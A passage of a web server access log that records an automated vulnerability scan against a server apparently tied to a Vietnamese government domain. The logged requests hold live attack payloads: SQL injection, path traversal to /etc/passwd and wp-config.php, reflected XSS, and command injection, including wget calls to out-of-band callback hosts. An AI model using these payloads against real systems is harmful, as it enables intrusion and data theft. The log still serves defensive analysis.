x%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 363 2023-11-09 19:47:24 103.153.214.94 GET / rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 373 2023-11-09 19:47:46 103.153.214.94 POST /checkValid - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 365 2023-11-09 19:48:08 103.153.214.94 GET /whoAmI/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 362 2023-11-09 19:48:11 103.153.214.94 GET /whoAmI/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 367 2023-11-09 19:49:17 103.153.214.94 GET /secure/ContactAdministrators!default.jspa - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 370 2023-11-09 19:49:25 103.153.214.94 GET /glpi/scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 365 2023-11-09 19:49:28 103.153.214.94 GET /debug/pprof/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 372 2023-11-09 19:49:28 103.153.214.94 GET /scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 389 2023-11-09 19:49:31 103.153.214.94 GET /debug/pprof/goroutine debug=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 364 2023-11-09 19:50:33 103.153.214.94 POST /config/pw_snmp_done.html - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 2478 2023-11-09 19:50:33 103.153.214.94 GET /LetsEncrypt/Index fileName=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 376 2023-11-09 19:50:35 103.153.214.94 GET /config/pw_snmp.html - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 360 2023-11-09 19:51:26 103.153.214.94 GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 375 2023-11-09 19:51:40 103.153.214.94 POST /crowd/admin/uploadplugin.action - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 364 2023-11-09 19:51:43 103.153.214.94 GET /crowd/plugins/servlet/exp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 373 2023-11-09 19:52:05 103.153.214.94 POST /wp-admin/options-general.php page=yuzo-related-post 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 363 2023-11-09 19:52:08 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 370 2023-11-09 19:52:28 103.153.214.94 GET /log type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 381 2023-11-09 19:52:39 103.153.214.94 GET /free_time.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 403 2023-11-09 19:52:40 103.153.214.94 GET /free_time_failed.cgi err_msg=<script>alert(document.domain);</script> 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 399 2023-11-09 19:52:49 103.153.214.94 GET /phpmyadmin/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 363 2023-11-09 19:53:24 103.153.214.94 GET /cgi-bin/kerbynet Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 364 2023-11-09 19:53:24 103.153.214.94 GET /mobile/index.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 368 2023-11-09 19:55:11 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 371 2023-11-09 19:55:13 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 363 2023-11-09 19:56:15 103.153.214.94 GET /wan.htm - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 363 2023-11-09 19:56:25 103.153.214.94 POST /NateMail.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 363 2023-11-09 19:56:27 103.153.214.94 GET /login - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 360 2023-11-09 19:56:30 103.153.214.94 POST /Collector/diagnostics/trace_route - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 362 2023-11-09 19:56:35 103.153.214.94 GET /login - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 369 2023-11-09 19:56:38 103.153.214.94 POST /Collector/diagnostics/ping - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 364 2023-11-09 19:58:06 103.153.214.94 GET /WidgetHandler.ashx MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 366 2023-11-09 19:58:18 103.153.214.94 GET /login - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 362 2023-11-09 19:59:09 103.153.214.94 GET /wp-content/plugins/adaptive-images/adaptive-images-script.php adaptive-images-settings[source_file]=../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 383 2023-11-09 19:59:47 103.153.214.94 POST /share/page/dologin - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 370 2023-11-09 20:00:19 103.153.214.94 GET /login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 367 2023-11-09 20:00:23 103.153.214.94 POST /Collector/appliancesettings/applianceSettingsFileTransfer - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 1464 2023-11-09 20:00:26 103.153.214.94 GET /talari/app/files/2XwZL7y5wNJqG1p38uWeOCOtpgN - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 363 2023-11-09 20:01:28 103.153.214.94 GET /tools/sourceViewer/index.html filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 1116 2023-11-09 20:01:45 103.153.214.94 GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php error&error_description=%3Csvg/onload=alert(1)%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 363 2023-11-09 20:03:12 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 365 2023-11-09 20:03:12 103.153.214.94 GET /mobile/error-not-supported-platform.html desktop_url=javascript:alert(1337);//itms:// 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 362 2023-11-09 20:03:15 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=c:/windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 362 2023-11-09 20:03:41 103.153.214.94 GET /Collector/storagemgmt/apply data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cl6fbhsfe7k9sg331pog9q377f8gk1oax.oast.pro%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype 443 - 101.35.195.134 - - 200 0 0 363 2023-11-09 20:04:02 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cl6fbhsfe7k9sg331pogo3ycn6uruig65.oast.pro) 443 - 101.35.195.134 - - 200 0 0 370 2023-11-09 20:04:56 103.153.214.94 GET /scripts/wa.exe OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 365 2023-11-09 20:05:04 103.153.214.94 POST /password_change.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 363 2023-11-09 20:05:30 103.153.214.94 GET / rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 369 2023-11-09 20:05:31 103.153.214.94 GET /base_import/static/c:/windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 390 2023-11-09 20:05:34 103.153.214.94 GET /web/static/c:/windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 362 2023-11-09 20:05:37 103.153.214.94 GET /base/static/c:/windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 362 2023-11-09 20:06:00 103.153.214.94 GET /wp-content/plugins/insert-php/readme.txt - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 370 2023-11-09 20:06:08 103.153.214.94 GET /password.jsn - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 390 2023-11-09 20:07:11 103.153.214.94 GET /wpdmpro/list-packages/ orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 362 2023-11-09 20:07:45 103.153.214.94 GET /cgi-bin/login_mgr.cgi C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 361 2023-11-09 20:08:27 103.153.214.94 POST /api/users - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 0 2 374 2023-11-09 20:08:41 103.153.214.94 GET /catalog.php filename=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 367 2023-11-09 20:09:17 103.153.214.94 GET /action/usermanager.htm - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 368 2023-11-09 20:09:49 103.153.214.94 GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 368 2023-11-09 20:10:02 103.153.214.94 GET /wp-content/plugins/checklist/images/checklist-icon.php fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 363 2023-11-09 20:10:53 103.153.214.94 GET /cgi-bin/config.exp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 363 2023-11-09 20:11:04 103.153.214.94 GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 364 2023-11-09 20:11:30 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 362 2023-11-09 20:11:53 103.153.214.94 POST /wp-json/visualizer/v1/update-chart - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 363 2023-11-09 20:11:55 103.153.214.94 POST /wp-json/visualizer/v1/upload-data - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 1467 2023-11-09 20:12:11 103.153.214.94 POST /session_login.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 363 2023-11-09 20:12:16 103.153.214.94 POST /rpc.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn/sysinfo.cgi?xnavigation=1 405 0 1 368 2023-11-09 20:12:17 103.153.214.94 POST /session_login.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 375 2023-11-09 20:12:19 103.153.214.94 POST /rpc.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn/sysinfo.cgi?xnavigation=1 405 0 1 406 2023-11-09 20:13:45 103.153.214.94 POST /admin/ n=language&c=language_general&a=doExportPack 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 369 2023-11-09 20:14:10 103.153.214.94 POST /ui/api/v1/ui/auth/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 369 2023-11-09 20:14:15 103.153.214.94 GET /admin/ n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 366 2023-11-09 20:14:32 103.153.214.94 GET /pages/systemcall.php command=cat%20/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 361 2023-11-09 20:15:11 103.153.214.94 GET /admin/ n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 366 2023-11-09 20:16:09 103.153.214.94 POST /getcfg.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 365 2023-11-09 20:16:11 103.153.214.94 POST /apply_sec.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 388 2023-11-09 20:16:14 103.153.214.94 POST /apply_sec.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn/login_pic.asp 405 0 1 360 2023-11-09 20:16:17 103.153.214.94 POST /apply_sec.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn/login_pic.asp 405 0 1 365 2023-11-09 20:16:51 103.153.214.94 GET /jnoj/web/polygon/problem/viewfile id=1&name=../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 370 2023-11-09 20:17:00 103.153.214.94 GET /osm/REGISTER.cmd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 20:17:03 103.153.214.94 GET /osm_tiles/REGISTER.cmd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 361 2023-11-09 20:17:32 103.153.214.94 GET /solr/admin/cores wt=json 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 370 2023-11-09 20:18:18 103.153.214.94 GET /api-third-party/download/extdisks../etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 0 377 2023-11-09 20:18:56 103.153.214.94 GET /getFavicon host=http://oast.fun/ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 366 2023-11-09 20:19:17 103.153.214.94 GET / pum_action=tools_page_tab_system_info 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 368 2023-11-09 20:19:19 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 365 2023-11-09 20:19:30 103.153.214.94 POST /admin/auth/reset-password - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 365 2023-11-09 20:19:36 103.153.214.94 GET /page/sl_logdl dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 362 2023-11-09 20:19:56 103.153.214.94 GET /MicroStrategyLibrary/auth/ui/loginPage loginMode=alert(document.domain) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 396 2023-11-09 20:20:21 103.153.214.94 POST /servlet/UploadServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 362 2023-11-09 20:20:24 103.153.214.94 GET /test.txt - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 361 2023-11-09 20:21:24 103.153.214.94 POST /_syslog.txt - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 361 2023-11-09 20:22:12 103.153.214.94 GET /wp-content/plugins/hmapsprem/views/dashboard/index.php p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 367 2023-11-09 20:22:12 103.153.214.94 GET /Login !'><sVg/OnLoAD=alert`1337`// 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 367 2023-11-09 20:23:33 103.153.214.94 GET /vpns/cfg/smb.conf - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 367 2023-11-09 20:24:22 103.153.214.94 POST /boafrm/formSysCmd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 